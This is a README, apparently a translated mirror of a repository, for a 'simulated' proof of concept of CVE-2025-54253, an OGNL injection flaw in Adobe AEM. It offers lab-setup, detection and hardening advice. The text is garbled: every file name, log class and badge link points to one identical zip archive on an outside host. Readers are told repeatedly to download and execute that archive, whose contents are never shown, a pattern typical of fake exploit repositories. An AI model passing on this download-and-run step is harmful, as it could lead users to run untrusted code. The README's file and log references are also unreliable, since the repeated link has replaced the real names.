jm7knz/CVE-2025-54253-Exploit-Demo

# CVE-2025-54253 Adobe AEM OGNL 注入模拟 PoC 实验环境 [](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip)  目录 - 概述 - 本仓库包含的内容 - 目标 - 威胁模型 - 安全实验室设置 - 如何运行模拟 - 观察要点 - 检测指南 - 缓解措施与加固 - 致蓝队 - 文件与结构 - 发布版本 - 贡献 - 许可证 - 维护者 - 参考资料与学习 概述 本仓库托管了 CVE-2025-54253 的模拟概念验证，这是 Adobe AEM 组件中报告的一个 OGNL 注入漏洞。该模拟旨在帮助安全团队和研究人员在受控实验室中复现该行为。本仓库不包含针对真实面向互联网系统的有效利用代码。请仅在受控、隔离的环境中使用这些内容。 本仓库包含的内容 - 一个模拟包，用于重建易受攻击的请求处理流程。该包模拟了 OGNL 表达式在配置错误的 AEM 表单处理程序中可能被评估的方式。 - 反映易受攻击实例可能发出的示例日志。 - 用于 SIEM 和 EDR 的检测规则和样本签名。 - 安全测试清单。 - 关于指标、缓解步骤和安全配置指导的文档。 目标 - 帮助测试人员构建可重复的实验室，以验证检测和修复措施。 - 教授指向 OGNL 注入尝试的防御性信号。 - 提供非可执行的说明性示例，以解释漏洞流程。 - 避免分发针对生产目标的有效远程利用代码。 威胁模型 - 攻击向量：向 AEM 表单端点发送包含 OGNL 表达式的精心构造的请求。 - 影响：如果发生评估，攻击者可能会执行服务器端代码或根据环境提升权限。 - 假设：实验室实例运行具有逼真的 AEM 设置。该环境可能包含默认或配置错误的组件。 安全实验室设置 - 在一个或多个隔离的虚拟机或本地沙箱中运行模拟。使用快照和临时实例。 - 不要将实验室虚拟机连接到生产网络。 - 限制服务帐户和凭据。在测试环境中使用一次性帐户。 - 确保您的测试 AEM 实例仅使用示例数据。 - 使用监控和日志记录工具，以便您可以在不冒失控影响风险的情况下观察行为。 如何运行模拟 - 从 Releases 获取模拟包：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip - 发布文件需要在隔离的测试虚拟机内下载并执行。该包包含一个分步 README，位于存档内，列出了部署模拟器、配置本地类 AEM 端点以及运行合成请求流程的顺序。 - 遵循发布包内的内部 README。发布的包仅包含模拟构件和精选日志。它不针对外部服务。 观察要点 - 显示 OGNL 风格 payload 字符串到达应用层的合成请求日志。 - 演示表达式解析和评估点的应用程序端堆栈跟踪。 - 为实验室虚拟机内的进程生成尝试、异常环境访问或文件写入生成的事件。 - 由提供的检测规则触发的 SIEM 警报。 检测指南 - 监视 HTTP 请求主体中看起来像 OGNL 表达式的模式。典型标记包括 %{...} 或直接的 OGNL 语法标记。使用百分比编码和双重编码检查。 - 检查日志中是否包含类 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip，https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip，或相关的评估堆栈跟踪。 - 创建关联规则，将异常请求主体与下游进程活动或意外的文件系统修改结合起来。 - 将基于正则表达式的签名添加到 WAF 以阻止明显的 OGNL payload 模式。不要仅依赖模式阻断；将阻断与检测配对使用。 建议的检测规则示例（概念性） - 标记主体包含匹配常见 OGNL 标记和函数调用模式的 POST 请求。 - 当应用程序日志中提到 OGNL、ExpressionFactory 或评估异常的解析错误时发出警报。 - 将源自 Web 用户的意外命令行进程创建与 HTTP 请求关联起来。 缓解措施与加固 - 将 AEM 升级到修复了 CVE-2025-54253 的供应商固定版本。应用供应商提供的补丁。 - 禁用或移除不需要的服务器端表达式评估功能。 - 在表单处理程序和模板处理器上执行严格的输入验证和规范化。 - 在适用的地方强化 Java SecurityManager 策略，以限制动态代码执行和反射。 - 在应用程序前放置 WAF，阻止已知的恶意模式并强制执行请求大小限制。 - 对服务帐户使用最小权限，并使用受限制的操作系统级权限运行应用程序进程。 致蓝队 - 在暂存 SIEM 中部署示例检测构件，并根据您的环境对其进行调优。 - 为应用程序在表单处理期间写入的目录添加文件完整性监控。 - 使用端点 EDR 策略防止 Web 进程生成 Shell 或创建新的系统用户。 - 为分诊创建 playbook 步骤：捕获 HTTP 请求，提取原始主体，在隔离服务器上复制，并检查本地更改。 文件与结构 - docs/ - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — SIEM 规则示例和调优说明。 - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — SOC 分诊清单步骤。 - samples/ - https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip — 用于实验室重放的合成请求。这些是说明性的且不可执行的。 - synthetic-logs/ — 反映易受攻击行为的精选日志。 - tools/ - lab-helpers/ — 用于在受控虚拟机中部署模拟器的脚本。发布版包含上面引用的可执行包。 - LICENSE 发布版本 [](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip) 访问 Releases 页面获取模拟包：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip 发布文件需要在隔离的实验室中下载并执行。该包包含有关如何设置模拟器、部署虚拟 AEM 端点以及运行测试流程的内部说明。 维护者 - jm7knz — 仓库所有者和策展人 - 贡献者可以提交带有额外检测内容、日志样本或实验室改进的问题或拉取请求。 贡献 - 如果您发现检测范围或文档存在缺口，请提交 GitHub issue。 - 提交可增强安全测试的防御性签名、日志示例或实验室编排脚本的 PR。 - 保持拉取请求重点突出，并在适用的情况下包含测试。不要添加针对隔离实验室之外真实系统的利用代码或工具。 许可证 - 本仓库使用 MIT 许可证。有关完整条款，请查看 LICENSE 文件。 参考资料与学习 - 关于 AEM 和表单组件的 Adobe 安全公告。 - OWASP 关于输入验证和安全反序列化的指南。 - 针对 CVE-2025-54253 及相关修复的供应商补丁说明。 - 用于理解表达式评估风险的通用 OGNL 资源。 图像和视觉辅助 - 仓库使用上面的安全横幅和徽章，以便快速导航到发布版本和版本信息。 - 将您自己的屏幕截图添加到 samples/ 文件夹，以显示实验室运行期间的 SIEM 命中或 EDR 警报。 用例 - 紫队可以运行模拟来测试检测和响应。 - 红队可以使用模拟构件来训练 playbook，而无需针对实时系统。 - 开发人员可以学习安全编码模式并移除有风险的表达式评估挂钩。 关键词和主题 adobe-aem, aem-forms-on-jee, curl, cve-2025-54253, cybersecurity, ethical-hacking, exploit, infosec, local-testing, offensive-security, ognl-injection-vulnerability, penetration-testing, poc, proof-of-concept, rce, red-team, remote-code-execution, vmware-lab, vulnerability-research 参考 - 供应商公告和补丁说明（在供应商站点搜索 CVE-2025-54253） - OWASP 测试指南 - 公共 SIEM 规则集和用于 Web payload 检测的正则表达式库 图像致谢 - 来自 GitHub Explore topics 的安全图标 - 徽章通过 https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip 生成 最后更新 - 查看 Releases 页面以获取最新的模拟包和变更日志：https://static.pigsec.cn/wp-content/uploads/repos/2026/03/2ca2d825df125635.zip

标签：0day, Adobe AEM, AEM Forms on JEE, AMSI绕过, CISA项目, CVE-2025-54253, EDR, JS文件枚举, OGNL注入, PoC, Python, RCE, SIEM规则, 威胁检测, 子域枚举, 数据展示, 无后门, 暴力破解, 漏洞复现, 红队, 编程工具, 网络安全, 脆弱性评估, 表达式语言注入, 输入验证绕过, 远程代码执行, 隐私保护